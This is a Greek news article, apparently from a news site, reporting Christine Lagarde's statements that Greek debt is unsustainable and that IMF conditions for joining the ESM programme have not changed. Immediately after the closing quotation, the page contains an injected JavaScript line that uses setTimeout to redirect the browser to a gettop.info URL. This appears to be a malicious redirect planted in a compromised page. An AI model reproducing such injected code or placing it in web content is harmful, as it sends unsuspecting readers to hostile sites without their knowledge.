Λαγκάρντ: Βιώσιμο χρέος και σοβαρές μεταρρυθμίσεις οι όροι μας

0
3

 

Η επικεφαλής του ΔΝΤ Κριστίν Λαγκάρντ, στο περιθώριο συνέντευξης Τύπου που παραχώρησε, εν όψει των εργασιών της Συνόδου του Ταμείου, κάλεσε για άλλη μια φορά την ελληνική κυβέρνηση να επισπεύσει την πρόοδο στην εφαρμογή των αναγκαίων διαρθρωτικών μεταρρυθμίσεων. «Έχει υπάρξει κάποια πρόοδος, αλλά πρέπει να γίνουν περισσότερα» σημείωσε.

«Για να συμμετάσχουμε στο πρόγραμμα απαιτούνται βιώσιμο χρέος και σοβαρές μεταρρυθμίσεις» έσπευσε να επισημάνει, ενώ πρόσθεσε: «Οι όροι μας είναι γνωστοί εδώ και καιρό και δεν έχουν αλλάξει».

Κληθείσα να τοποθετηθεί, αναφορικά με το εάν τα χαμηλότερα πρωτογενή πλεονάσματα είναι απαραίτητος όρος του ΔΝΤ, προκειμένου να επανέλθει στο πρόγραμμα του Ευρωπαϊκού Μηχανισμού Σταθερότητας (ESM) για την Ελλάδα, αλλά και στο πώς το Ταμείο απαντά στους Ευρωπαίους αξιωματούχους, που δημόσια του ζητούν να «μαλακώσει» τις απαιτήσεις του για την ελάφρυνση του ελληνικού χρέους, η επικεφαλής του Ταμείου δεν θέλησε να απαντήσει ευθέως.

«Έχουμε στο παρελθόν δείξει ευελιξία στην αξιολόγηση της βιωσιμότητας του ελληνικού χρέους, αλλά, όπως είναι σήμερα, το χρέος δεν είναι βιώσιμο» τόνισε.

Μάλιστα, ανέφερε ότι κλιμάκιο του ΔΝΤ θα μεταβεί στην Ελλάδα, για να διασφαλίσει την απρόσκοπτη εφαρμογή των συμφωνηθέντων μεταρρυθμίσεων, στο πλαίσιο του ESM.

Σχετικά με την παγκόσμια οικονομία, παραδέχθηκε πως παραμένει υποτονική για μεγάλο χρονικό διάστημα. «Το “κλειδί” είναι να δράσουμε άμεσα» συμπλήρωσε.

Η κα Λαγκάρντ εστίασε στην αναγκαιότητα μεγαλύτερης συνεργασίας, προκειμένου να τονωθεί η ανάπτυξη και να επιμεριστούν καλύτερα τα οφέλη της οικονομίας.

Συγκεκριμένα σε ότι αφορά στην Ελλάδα η ακριβής δήλωση της είναι η εξής:
«Μόλις ολοκληρώσαμε ένα άρθρο 4 στην Ελλάδα, που είναι μία διμερής προσπάθεια εποπτείας με την Ελλάδα και τα αποτελέσματα είναι δημοσιευμένα.
Έδειξε ότι κάποιες μεταρρυθμίσεις έχουν γίνει και πολύ περισσότερη δουλειά χρειάζεται να γίνει στο μέλλον, όπως γνωρίζουμε. Θα στείλουμε μία ομάδα σε δύο εβδομάδες για να βοηθήσουμε με την αξιολόγηση των δεσμεύσεων που έχουν αναληφθεί στο πλαίσιο του προγράμματος του ESM, διότι, όπως γνωρίζετε, δεν συμμετέχουμε αυτή τη στιγμή στο πρόγραμμα.
Οι προϋποθέσεις για να συμμετέχουμε δεν έχουν αλλάξει, πιστεύουμε ότι πρέπει να γίνουν πολύ σημαντικές διαρθρωτικές μεταρρυθμίσεις, και επίσης πιστεύουμε ότι το χρέος πρέπει να είναι βιώσιμο στο μέλλον. Έχουμε δείξει ευελιξία στο παρελθόν, προκειμένου να αξιολογήσουμε τη βιωσιμότητα του χρέους, αλλά ξεκάθαρα πιστεύουμε ότι, όπως είναι το χρέος, δεν είναι βιώσιμο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here